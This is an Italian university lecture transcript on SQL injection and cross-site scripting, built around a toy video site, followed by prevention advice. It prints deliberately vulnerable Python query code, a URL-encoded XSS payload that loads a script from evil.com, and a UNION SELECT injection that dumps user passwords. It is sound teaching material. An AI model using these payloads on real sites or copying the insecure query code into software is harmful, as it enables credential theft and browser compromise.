Analisi di vulnerabilità e prevenzione di attacchi SQL injection e Cross-site Scripting

Транскрипт

1 Pattern Recognition and Applications Lab Analisi di vulnerabilità e prevenzione di attacchi SQL injection e Cross-site Scripting Dott. Ing. Igino Corona igino.corona (at) diee.unica.it Corso Sicurezza Informatica 2014/2015 Department of Electrical and Electronic Engineering University of Cagliari, Italy

2 About me Assegnista di Ricerca - DIEE, UniCA Principali interessi di ricerca: Rilevazione di attacchi informatici Reti Fast Flux Servizi Web Malware - PDF, Android, JavaScript Pagine web di Phishing Siti di vendita illegale di farmaci Tecniche di apprendimento automatico Robuste ad attacchi da parte di un avversario intelligente Evasione, inquinamento dati di addestramento Applicate a prototipi e problemi reali 2

3 Alcuni progetti e sistemi sviluppati Febbraio Febbraio 2016 Budget ( ): 364,000 Novembre Maggio 2015 Budget ( ): 219,100 Gennaio Dicembre 2015 Budget ( ): 1,289,764 FluxBuster FightPhishing SuStorID Lux0R Malware 3

4 Servizio Web Qualsiasi servizio che utilizzi il protocollo HTTP(S) per lo scambio di dati GET /watch?v=usbjl-wo9xm HTTP(S) protocol Web Browser Internet Explorer Web Server 4

5 Servizio Web - meccanismo base La richiesta HTTP(S) viene interpretata lato server per identificare un applicazione web (programma) e i suoi input GET /watch?v=usbjl-wo9xm Web Browser Internet Explorer attributo = valore Web Server input seleziona applicazione web programma HTML, testo, immagini, video, output N.B. Gli input non si limitano alla request line! 5

6 Servizio Web - Input Validation Attack Cosa succede se gli input non sono fra quelli previsti in fase di sviluppo dell applicazione web? GET /watch?v=<evil input> HTTP(S) protocol Web Client Attacker Script Web Server output? 6

7 Validazione degli input In questa lezione vedremo due tipologie di attacco molto diffuse che sfruttano vulnerabilità relative alla validazione dell input delle applicazioni web SQL Injection Cross-site Scripting Corrispondono alle minacce OWASP di livello A1 e A3 (2013) _Italiano.pdf 7

8 Database e Web apps - Youtube Database video hash tags content users user password usbjl-wo9xm 39vhEHUOBRU slash; world on fire; deep purple; made in japan; [binary] [binary] jhonny mary supersecure214 beatles203 Web Applications (Python) def results(search_query): query = "SELECT DISTINCT hash FROM video WHERE tags LIKE '%%%s%%' " % search_query hashes = db_cursor.execute(query) return results_page(search_query, hashes) def getvideo(v): query = "SELECT content FROM video WHERE hash='%s'" % v return db_cursor.execute(query) 8

9 Servizio Web - Youtube La richiesta HTTP(S) viene interpretata lato server per identificare un applicazione web (programma) e i suoi input GET /results?search_query=deep+purple Web Browser Internet Explorer search_query = deep purple" Web Server input seleziona applicazione web results() Deep Purple video results output 9

10 Youtube 10

11 Cross-site Scripting input output 11

12 Cross-site Scripting Il servizio normalmente funziona bene, ma è affetto da una GRAVE vulnerabilità la variabile seach_query viene validata? def results(search_query): query = "SELECT DISTINCT hash FROM video WHERE tags LIKE '%%%s%%' " % search_query hashes = db_cursor.execute(query) return results_page(search_query, hashes) Obiettivo: infettare un computer vittima attraverso link relativo a Youtube Tecnica: può sfruttare una vulnerabilità XSS di Youtube per eseguire JavaScript malware sul computer vittima search_query = "%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F %65%76%69%6C%2E%63%6F%6D%2F%65%78%70%6C%6F%69%74%2E%6A%73%22%3E%3C%2F %73%63%72%69%70%74%3E" Se search_query viene riportato nell output della pagina così com è e viene interpretato dal browser come normale codice HTML <script src= ></script> 12

13 Youtube - Cross-site Scripting GET /results?search_query=<evil input> Hey check out this Youtube video! Victim User Internet Explorer Web Server v = "<evil input>" input seleziona applicazione web results() Tiny Youtube search page +malicious JavaScript code output <evil input>=%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a %2F%2F%65%76%69%6C%2E%63%6F%6D%2F%65%78%70%6C%6F%69%74%2E%6A %73%22%3E%3C%2F%73%63%72%69%70%74%3E 13

14 SQL Injection In genere una web application si appoggia ad uno o piu database di backend per restituire i contenuti client web application database Ad esempio il nostro Youtube usa un database per memorizzare video, tags, e credenziali degli utenti. Se l input alla web app non viene correttamente validato Un attaccante può eseguire query piu o meno arbitrarie sul database per ottenere informazioni confidenziali, acquisire accesso non autorizzato ai sistemi, e/o compromettere l intera base di dati 14

15 Servizio Web - Tiny Youtube La richiesta HTTP(S) viene interpretata lato server per identificare un applicazione web (programma) e i suoi input GET /watch?v=usbjl-wo9xm Web Browser Internet Explorer v = "usbjl-wo9xm" Web Server input seleziona applicazione web getvideo() Deep Purple - Made in Japan video stream output 15

16 SQL Injection 16

17 GET Video Il servizio normalmente funziona bene, ma è affetto da una GRAVE vulnerabilità Web Application (Python) la variabile v viene validata? def getvideo(v): query = "SELECT content FROM video WHERE hash='%s'" % v return db_cursor.execute(query) Obiettivo: ottenere username e password di Youtube Tecnica: può usare SQL injection sfruttando la mancata validazione di input sulla variabile v v = "usbjl-wo9xm' UNION SELECT CONCAT(user,' ',password) FROM users WHERE '1'='1" query = "SELECT content FROM video WHERE hash='usbjl-wo9xm' UNION SELECT CONCAT(user,' ',pass) FROM users WHERE 1'='1'" Alla fine dello stream video troverà concatenati tutti i nomi utente e le password degli utenti del servizio! 17

18 SQL Injection GET /watch?v=<evil input> Web Client Attacker Script v = "<evil input>" Web Server input seleziona applicazione web getvideo() Slash - World On Fire video stream +concat(user,password) output <evil input>=usbjl-wo9xm'/**/union/**/select/**/ CONCAT(user,' ',pass)/**/from/**/users/**/where/**/'1'='1 18

19 Live Demo Per i nostri test useremo 19

20 Prevenzione attacchi a servizi Web La natura delle applicazioni web è spesso eterogenea diverse architetture, linguaggi di programmazione, librerie, ambienti di sviluppo funzionalità molto variegate interazione con altri sistemi: es. database, sensori, servizi web di terze parti, etc. gestione di informazioni di vario tipo e confidenzialità diverse necessità in termini di disponibilità e qualità del servizio, anche in funzione del numero e tipologia di utenze difficile affrontare il problema in maniera generale esistono tuttavia delle metodiche di sviluppo sicuro del codice per prevenire le vulnerabilità piu comuni e pericolose importante riferimento è OWASP images/0/08/owasp_scp_quick_reference_guide_v2.pdf 20

21 Prevenzione attacchi a servizi Web Le best practice di sviluppo previste dall ingegneria del software sono un punto di partenza La sicurezza è implementabile attraverso dei vincoli addizionali (funzionali e non) che devono prendere parte nel progetto stesso es. crittografia, meccanismi di verifica del funzionamento dell applicazione, profiling delle azioni compiute dagli utenti/ host client in genere è molto meno costoso che correggere il software in corso d opera o addirittura dopo il rilascio tradeoff con usabilità Alcune linee guida: validazione dell input: gestire tutte le situazioni in cui l input non è quello atteso. L input è di default NON FIDATO rispetto della logica applicativa: assicurarsi che non esistano (sequenze di) richieste, o condizioni relative ai sistemi con cui l applicazione interagisce, che possano portare l applicazione web in stati non previsti 21

22 Prevenzione attacchi a servizi Web Le best practice di sviluppo previste dall ingegneria del software sono un punto di partenza La sicurezza è implementabile attraverso dei vincoli addizionali (funzionali e non) che devono prendere parte nel progetto stesso es. crittografia, meccanismi di verifica del funzionamento dell applicazione, profiling delle azioni compiute dagli utenti/ host client in genere è molto meno costoso che correggere il software in corso d opera o addirittura dopo il rilascio tradeoff con usabilità Per implementare in maniera corretta vincoli legati alla sicurezza è bene utilizzare dei framework di sviluppo e delle librerie ben collaudati es. python Django, Java Spring, Ruby on Rails devono essere considerati solo come un supporto la sicurezza delle web app è comunque legata sempre e comunque ad un corretto utilizzo dei framework e librerie 22

23 Nella prossima lezione Come in tutte le problematiche di sicurezza, la prevenzione è solo una parte della soluzione Vedremo i principali meccanismi di rilevazione e risposta contro attacchi a servizi web Ad esempio, contro attacchi automatizzati di password guessing, information gathering, utilizzo del servizio in maniera anomala 23